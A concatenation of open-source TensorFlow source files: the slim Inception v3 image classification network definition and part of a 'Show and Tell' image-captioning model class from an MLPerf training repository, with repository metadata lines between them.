v['DVIPSFLAGS'] = '-Ppdf'
| bsd-3-clause |
mengxn/tensorflow | tensorflow/contrib/slim/python/slim/nets/inception_v3.py | 89 | 30528 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains the definition for inception v3 classification network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib.framework.python.ops import arg_scope
from tensorflow.contrib.layers.python.layers import layers as layers_lib
from tensorflow.contrib.layers.python.layers import regularizers
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variable_scope
trunc_normal = lambda stddev: init_ops.truncated_normal_initializer(0.0, stddev)
def inception_v3_base(inputs,
final_endpoint='Mixed_7c',
min_depth=16,
depth_multiplier=1.0,
scope=None):
"""Inception model from http://arxiv.org/abs/1512.00567.
Constructs an Inception v3 network from inputs to the given final endpoint.
This method can construct the network up to the final inception block
Mixed_7c.
Note that the names of the layers in the paper do not correspond to the names
of the endpoints registered by this function although they build the same
network.
Here is a mapping from the old_names to the new names:
Old name | New name
=======================================
conv0 | Conv2d_1a_3x3
conv1 | Conv2d_2a_3x3
conv2 | Conv2d_2b_3x3
pool1 | MaxPool_3a_3x3
conv3 | Conv2d_3b_1x1
conv4 | Conv2d_4a_3x3
pool2 | MaxPool_5a_3x3
mixed_35x35x256a | Mixed_5b
mixed_35x35x288a | Mixed_5c
mixed_35x35x288b | Mixed_5d
mixed_17x17x768a | Mixed_6a
mixed_17x17x768b | Mixed_6b
mixed_17x17x768c | Mixed_6c
mixed_17x17x768d | Mixed_6d
mixed_17x17x768e | Mixed_6e
mixed_8x8x1280a | Mixed_7a
mixed_8x8x2048a | Mixed_7b
mixed_8x8x2048b | Mixed_7c
Args:
inputs: a tensor of size [batch_size, height, width, channels].
final_endpoint: specifies the endpoint to construct the network up to. It
can be one of ['Conv2d_1a_3x3', 'Conv2d_2a_3x3', 'Conv2d_2b_3x3',
'MaxPool_3a_3x3', 'Conv2d_3b_1x1', 'Conv2d_4a_3x3', 'MaxPool_5a_3x3',
'Mixed_5b', 'Mixed_5c', 'Mixed_5d', 'Mixed_6a', 'Mixed_6b', 'Mixed_6c',
'Mixed_6d', 'Mixed_6e', 'Mixed_7a', 'Mixed_7b', 'Mixed_7c'].
min_depth: Minimum depth value (number of channels) for all convolution ops.
Enforced when depth_multiplier < 1, and not an active constraint when
depth_multiplier >= 1.
depth_multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
scope: Optional variable_scope.
Returns:
tensor_out: output tensor corresponding to the final_endpoint.
end_points: a set of activations for external use, for example summaries or
losses.
Raises:
ValueError: if final_endpoint is not set to one of the predefined values,
or depth_multiplier <= 0
"""
# end_points will collect relevant activations for external use, for example
# summaries or losses.
end_points = {}
if depth_multiplier <= 0:
raise ValueError('depth_multiplier is not greater than zero.')
depth = lambda d: max(int(d * depth_multiplier), min_depth)
with variable_scope.variable_scope(scope, 'InceptionV3', [inputs]):
with arg_scope(
[layers.conv2d, layers_lib.max_pool2d, layers_lib.avg_pool2d],
stride=1,
padding='VALID'):
# 299 x 299 x 3
end_point = 'Conv2d_1a_3x3'
net = layers.conv2d(inputs, depth(32), [3, 3], stride=2, scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 149 x 149 x 32
end_point = 'Conv2d_2a_3x3'
net = layers.conv2d(net, depth(32), [3, 3], scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 147 x 147 x 32
end_point = 'Conv2d_2b_3x3'
net = layers.conv2d(
net, depth(64), [3, 3], padding='SAME', scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 147 x 147 x 64
end_point = 'MaxPool_3a_3x3'
net = layers_lib.max_pool2d(net, [3, 3], stride=2, scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 73 x 73 x 64
end_point = 'Conv2d_3b_1x1'
net = layers.conv2d(net, depth(80), [1, 1], scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 73 x 73 x 80.
end_point = 'Conv2d_4a_3x3'
net = layers.conv2d(net, depth(192), [3, 3], scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 71 x 71 x 192.
end_point = 'MaxPool_5a_3x3'
net = layers_lib.max_pool2d(net, [3, 3], stride=2, scope=end_point)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# 35 x 35 x 192.
# Inception blocks
with arg_scope(
[layers.conv2d, layers_lib.max_pool2d, layers_lib.avg_pool2d],
stride=1,
padding='SAME'):
# mixed: 35 x 35 x 256.
end_point = 'Mixed_5b'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(48), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(64), [5, 5], scope='Conv2d_0b_5x5')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0c_3x3')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(32), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_1: 35 x 35 x 288.
end_point = 'Mixed_5c'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(48), [1, 1], scope='Conv2d_0b_1x1')
branch_1 = layers.conv2d(
branch_1, depth(64), [5, 5], scope='Conv_1_0c_5x5')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0c_3x3')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(64), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_2: 35 x 35 x 288.
end_point = 'Mixed_5d'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(48), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(64), [5, 5], scope='Conv2d_0b_5x5')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = layers.conv2d(
branch_2, depth(96), [3, 3], scope='Conv2d_0c_3x3')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(64), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_3: 17 x 17 x 768.
end_point = 'Mixed_6a'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net,
depth(384), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(64), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(96), [3, 3], scope='Conv2d_0b_3x3')
branch_1 = layers.conv2d(
branch_1,
depth(96), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_1x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers_lib.max_pool2d(
net, [3, 3], stride=2, padding='VALID', scope='MaxPool_1a_3x3')
net = array_ops.concat([branch_0, branch_1, branch_2], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed4: 17 x 17 x 768.
end_point = 'Mixed_6b'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(128), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(128), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(128), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(128), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(128), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(128), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_5: 17 x 17 x 768.
end_point = 'Mixed_6c'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(160), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_6: 17 x 17 x 768.
end_point = 'Mixed_6d'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(160), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(160), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(160), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(160), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_7: 17 x 17 x 768.
end_point = 'Mixed_6e'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(192), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [7, 1], scope='Conv2d_0b_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0c_1x7')
branch_2 = layers.conv2d(
branch_2, depth(192), [7, 1], scope='Conv2d_0d_7x1')
branch_2 = layers.conv2d(
branch_2, depth(192), [1, 7], scope='Conv2d_0e_1x7')
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_8: 8 x 8 x 1280.
end_point = 'Mixed_7a'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_0 = layers.conv2d(
branch_0,
depth(320), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_3x3')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(192), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
branch_1 = layers.conv2d(
branch_1,
depth(192), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_3x3')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers_lib.max_pool2d(
net, [3, 3], stride=2, padding='VALID', scope='MaxPool_1a_3x3')
net = array_ops.concat([branch_0, branch_1, branch_2], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_9: 8 x 8 x 2048.
end_point = 'Mixed_7b'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(320), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(384), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = array_ops.concat(
[
layers.conv2d(
branch_1, depth(384), [1, 3], scope='Conv2d_0b_1x3'),
layers.conv2d(
branch_1, depth(384), [3, 1], scope='Conv2d_0b_3x1')
],
3)
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(448), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(384), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = array_ops.concat(
[
layers.conv2d(
branch_2, depth(384), [1, 3], scope='Conv2d_0c_1x3'),
layers.conv2d(
branch_2, depth(384), [3, 1], scope='Conv2d_0d_3x1')
],
3)
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_10: 8 x 8 x 2048.
end_point = 'Mixed_7c'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(320), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(384), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = array_ops.concat(
[
layers.conv2d(
branch_1, depth(384), [1, 3], scope='Conv2d_0b_1x3'),
layers.conv2d(
branch_1, depth(384), [3, 1], scope='Conv2d_0c_3x1')
],
3)
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(448), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(384), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = array_ops.concat(
[
layers.conv2d(
branch_2, depth(384), [1, 3], scope='Conv2d_0c_1x3'),
layers.conv2d(
branch_2, depth(384), [3, 1], scope='Conv2d_0d_3x1')
],
3)
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
raise ValueError('Unknown final endpoint %s' % final_endpoint)
def inception_v3(inputs,
num_classes=1000,
is_training=True,
dropout_keep_prob=0.8,
min_depth=16,
depth_multiplier=1.0,
prediction_fn=layers_lib.softmax,
spatial_squeeze=True,
reuse=None,
scope='InceptionV3'):
"""Inception model from http://arxiv.org/abs/1512.00567.
"Rethinking the Inception Architecture for Computer Vision"
Christian Szegedy, Vincent Vanhoucke, Sergey Ioffe, Jonathon Shlens,
Zbigniew Wojna.
With the default arguments this method constructs the exact model defined in
the paper. However, one can experiment with variations of the inception_v3
network by changing arguments dropout_keep_prob, min_depth and
depth_multiplier.
The default image size used to train this network is 299x299.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_classes: number of predicted classes.
is_training: whether is training or not.
dropout_keep_prob: the percentage of activation values that are retained.
min_depth: Minimum depth value (number of channels) for all convolution ops.
Enforced when depth_multiplier < 1, and not an active constraint when
depth_multiplier >= 1.
depth_multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
prediction_fn: a function to get predictions out of logits.
spatial_squeeze: if True, logits is of shape is [B, C], if false logits is
of shape [B, 1, 1, C], where B is batch_size and C is number of classes.
reuse: whether or not the network and its variables should be reused. To be
able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
logits: the pre-softmax activations, a tensor of size
[batch_size, num_classes]
end_points: a dictionary from components of the network to the corresponding
activation.
Raises:
ValueError: if 'depth_multiplier' is less than or equal to zero.
"""
if depth_multiplier <= 0:
raise ValueError('depth_multiplier is not greater than zero.')
depth = lambda d: max(int(d * depth_multiplier), min_depth)
with variable_scope.variable_scope(
scope, 'InceptionV3', [inputs, num_classes], reuse=reuse) as scope:
with arg_scope(
[layers_lib.batch_norm, layers_lib.dropout], is_training=is_training):
net, end_points = inception_v3_base(
inputs,
scope=scope,
min_depth=min_depth,
depth_multiplier=depth_multiplier)
# Auxiliary Head logits
with arg_scope(
[layers.conv2d, layers_lib.max_pool2d, layers_lib.avg_pool2d],
stride=1,
padding='SAME'):
aux_logits = end_points['Mixed_6e']
with variable_scope.variable_scope('AuxLogits'):
aux_logits = layers_lib.avg_pool2d(
aux_logits, [5, 5],
stride=3,
padding='VALID',
scope='AvgPool_1a_5x5')
aux_logits = layers.conv2d(
aux_logits, depth(128), [1, 1], scope='Conv2d_1b_1x1')
# Shape of feature map before the final layer.
kernel_size = _reduced_kernel_size_for_small_input(aux_logits, [5, 5])
aux_logits = layers.conv2d(
aux_logits,
depth(768),
kernel_size,
weights_initializer=trunc_normal(0.01),
padding='VALID',
scope='Conv2d_2a_{}x{}'.format(*kernel_size))
aux_logits = layers.conv2d(
aux_logits,
num_classes, [1, 1],
activation_fn=None,
normalizer_fn=None,
weights_initializer=trunc_normal(0.001),
scope='Conv2d_2b_1x1')
if spatial_squeeze:
aux_logits = array_ops.squeeze(
aux_logits, [1, 2], name='SpatialSqueeze')
end_points['AuxLogits'] = aux_logits
# Final pooling and prediction
with variable_scope.variable_scope('Logits'):
kernel_size = _reduced_kernel_size_for_small_input(net, [8, 8])
net = layers_lib.avg_pool2d(
net,
kernel_size,
padding='VALID',
scope='AvgPool_1a_{}x{}'.format(*kernel_size))
# 1 x 1 x 2048
net = layers_lib.dropout(
net, keep_prob=dropout_keep_prob, scope='Dropout_1b')
end_points['PreLogits'] = net
# 2048
logits = layers.conv2d(
net,
num_classes, [1, 1],
activation_fn=None,
normalizer_fn=None,
scope='Conv2d_1c_1x1')
if spatial_squeeze:
logits = array_ops.squeeze(logits, [1, 2], name='SpatialSqueeze')
# 1000
end_points['Logits'] = logits
end_points['Predictions'] = prediction_fn(logits, scope='Predictions')
return logits, end_points
inception_v3.default_image_size = 299
def _reduced_kernel_size_for_small_input(input_tensor, kernel_size):
"""Define kernel size which is automatically reduced for small input.
If the shape of the input images is unknown at graph construction time this
function assumes that the input images are is large enough.
Args:
input_tensor: input tensor of size [batch_size, height, width, channels].
kernel_size: desired kernel size of length 2: [kernel_height, kernel_width]
Returns:
a tensor with the kernel size.
TODO(jrru): Make this function work with unknown shapes. Theoretically, this
can be done with the code below. Problems are two-fold: (1) If the shape was
known, it will be lost. (2) inception.tf.contrib.slim.ops._two_element_tuple
cannot
handle tensors that define the kernel size.
shape = tf.shape(input_tensor)
return = tf.stack([tf.minimum(shape[1], kernel_size[0]),
tf.minimum(shape[2], kernel_size[1])])
"""
shape = input_tensor.get_shape().as_list()
if shape[1] is None or shape[2] is None:
kernel_size_out = kernel_size
else:
kernel_size_out = [
min(shape[1], kernel_size[0]), min(shape[2], kernel_size[1])
]
return kernel_size_out
def inception_v3_arg_scope(weight_decay=0.00004,
stddev=0.1,
batch_norm_var_collection='moving_vars'):
"""Defines the default InceptionV3 arg scope.
Args:
weight_decay: The weight decay to use for regularizing the model.
stddev: The standard deviation of the trunctated normal weight initializer.
batch_norm_var_collection: The name of the collection for the batch norm
variables.
Returns:
An `arg_scope` to use for the inception v3 model.
"""
batch_norm_params = {
# Decay for the moving averages.
'decay': 0.9997,
# epsilon to prevent 0s in variance.
'epsilon': 0.001,
# collection containing update_ops.
'updates_collections': ops.GraphKeys.UPDATE_OPS,
# collection containing the moving mean and moving variance.
'variables_collections': {
'beta': None,
'gamma': None,
'moving_mean': [batch_norm_var_collection],
'moving_variance': [batch_norm_var_collection],
}
}
# Set weight_decay for weights in Conv and FC layers.
with arg_scope(
[layers.conv2d, layers_lib.fully_connected],
weights_regularizer=regularizers.l2_regularizer(weight_decay)):
with arg_scope(
[layers.conv2d],
weights_initializer=init_ops.truncated_normal_initializer(
stddev=stddev),
activation_fn=nn_ops.relu,
normalizer_fn=layers_lib.batch_norm,
normalizer_params=batch_norm_params) as sc:
return sc
| apache-2.0 |
mlperf/training_results_v0.5 | v0.5.0/google/cloud_v2.8/ssd-tpuv2-8/code/ssd/model/tpu/models/experimental/show_and_tell/show_and_tell_model.py | 5 | 13300 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Standard Imports
import tensorflow as tf
import image_embedding
import image_processing
import inputs as input_ops
class ShowAndTellModel(object):
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
def __init__(self, config, mode, train_inception=False):
"""Basic setup.
Args:
config: Object containing configuration parameters.
mode: "train", "eval" or "inference".
train_inception: Whether the inception submodel variables are trainable.
"""
assert mode in ["train", "eval", "inference"]
self.config = config
self.mode = mode
self.train_inception = train_inception
# To match the "Show and Tell" paper we initialize all variables with a
# random uniform initializer.
self.initializer = tf.random_uniform_initializer(
minval=-self.config.initializer_scale,
maxval=self.config.initializer_scale)
# A float32 Tensor with shape [batch_size, height, width, channels].
self.images = None
# An int32 Tensor with shape [batch_size, padded_length].
self.input_seqs = None
# An int32 Tensor with shape [batch_size, padded_length].
self.target_seqs = None
# An int32 0/1 Tensor with shape [batch_size, padded_length].
self.input_mask = None
# A float32 Tensor with shape [batch_size, embedding_size].
self.image_embeddings = None
# A float32 Tensor with shape [batch_size, padded_length, embedding_size].
self.seq_embeddings = None
# A float32 scalar Tensor; the total loss for the trainer to optimize.
self.total_loss = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_losses = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_loss_weights = None
# Collection of variables from the inception submodel.
self.inception_variables = []
# Function to restore the inception submodel from checkpoint.
self.init_fn = None
# Global step Tensor.
self.global_step = None
def is_training(self):
"""Returns true if the model is built for training mode."""
return self.mode == "train"
def load_image(self, encoded_image, thread_id=0):
"""Decodes and processes an image string.
Args:
encoded_image: A scalar string Tensor; the encoded image.
thread_id: Preprocessing thread id used to select the ordering of color
distortions.
Returns:
A float32 Tensor of shape [height, width, 3]; the processed image.
"""
return image_processing.process_image(
encoded_image,
is_training=self.is_training(),
height=self.config.image_height,
width=self.config.image_width,
thread_id=thread_id,
image_format=self.config.image_format)
def distort_images(self, images, seed):
"""Distort a batch of images.
(Processing a batch allows us to easily switch between TPU and CPU
execution).
"""
if self.mode == "train":
images = image_processing.distort_image(images, seed)
# Rescale to [-1,1] instead of [0, 1]
images = tf.subtract(images, 0.5)
images = tf.multiply(images, 2.0)
return images
def build_inputs(self):
"""Input prefetching, preprocessing and batching.
Outputs:
self.images
self.input_seqs
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
"""
if self.mode == "inference":
# In inference mode, images and inputs are fed via placeholders.
image_feed = tf.placeholder(dtype=tf.string, shape=[], name="image_feed")
input_feed = tf.placeholder(
dtype=tf.int64,
shape=[None], # batch_size
name="input_feed")
# Process image and insert batch dimensions.
images = tf.expand_dims(self.load_image(image_feed), 0)
input_seqs = tf.expand_dims(input_feed, 1)
# No target sequences or input mask in inference mode.
target_seqs = None
input_mask = None
else:
def _load_example(serialized_example):
encoded_image, caption = input_ops.parse_example(
serialized_example,
image_feature=self.config.image_feature_name,
caption_feature=self.config.caption_feature_name)
image = self.load_image(encoded_image)
# strings.split expects a batch
words = tf.strings.split(tf.reshape(caption, [1]), sep=" ")
words = tf.sparse_tensor_to_dense(words, default_value="")[0]
word_idx = tf.strings.to_hash_bucket(words, self.config.vocab_size)
input_seqs, target_seqs, input_mask = input_ops.pad_caption_to_input(
word_idx)
return image, input_seqs, target_seqs, input_mask
def _load_dataset(filename):
return tf.data.TFRecordDataset(filename, buffer_size=16 * 1024 * 1024)
df = tf.data.Dataset.list_files(
self.config.input_file_pattern, shuffle=self.mode == "train")
df = df.apply(
tf.data.experimental.parallel_interleave(
_load_dataset, cycle_length=64, sloppy=True))
if self.mode == "train":
df = df.repeat()
df = df.shuffle(1024)
df = df.apply(
tf.data.experimental.map_and_batch(
_load_example,
self.config.batch_size,
num_parallel_batches=8,
drop_remainder=True))
df = df.prefetch(8)
images, input_seqs, target_seqs, input_mask = df.make_one_shot_iterator(
).get_next()
self.images = images
self.input_seqs = input_seqs
self.target_seqs = target_seqs
self.input_mask = input_mask
